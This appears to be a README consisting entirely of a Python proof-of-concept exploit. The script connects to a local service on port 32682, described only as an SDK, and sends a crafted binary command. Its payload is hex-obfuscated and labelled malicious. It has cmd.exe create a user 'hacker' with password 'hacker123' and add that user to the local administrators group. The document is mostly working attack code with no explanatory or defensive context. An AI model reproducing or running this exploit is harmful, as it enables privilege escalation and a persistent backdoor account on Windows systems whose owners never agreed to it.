README.md
Rendering markdown...
import socket
HOST = "127.0.0.1"
PORT = 32682
#SDK RUN
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
intro = b'\x0f\x27\x00\x00'
cmd = bytearray()
cmd.append(5)
cmd.append(3)
cmd.append(1)
cmd.append(8)
cmd.append(255)
cmd.append(255)
cmd.append(255)
cmd.append(252)
### Malicious payload:
hax = b'\x43\x3a\x5c\x5c\x57\x69\x6e\x64\x6f\x77\x73\x5c\x5c\x53\x79\x73\x74\x65\x6d\x33\x32\x5c\x5c\x63\x6d\x64\x2e\x65\x78\x65\x2c\x2f\x63\x20\x22\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x2f\x61\x64\x64\x20\x68\x61\x63\x6b\x65\x72\x20\x68\x61\x63\x6b\x65\x72\x31\x32\x33\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x65\x72\x20\x2f\x61\x64\x64\x20\x3e\x3e\x20\x43\x3a\x5c\x5c\x55\x73\x65\x72\x73\x5c\x5c\x50\x75\x62\x6c\x69\x63\x5c\x5c\x77\x68\x6f\x61\x6d\x69\x2e\x74\x78\x74\x22'
print("Payload sent!")
s.send(intro + cmd + hax)
print(s.recv(2048))
s.close()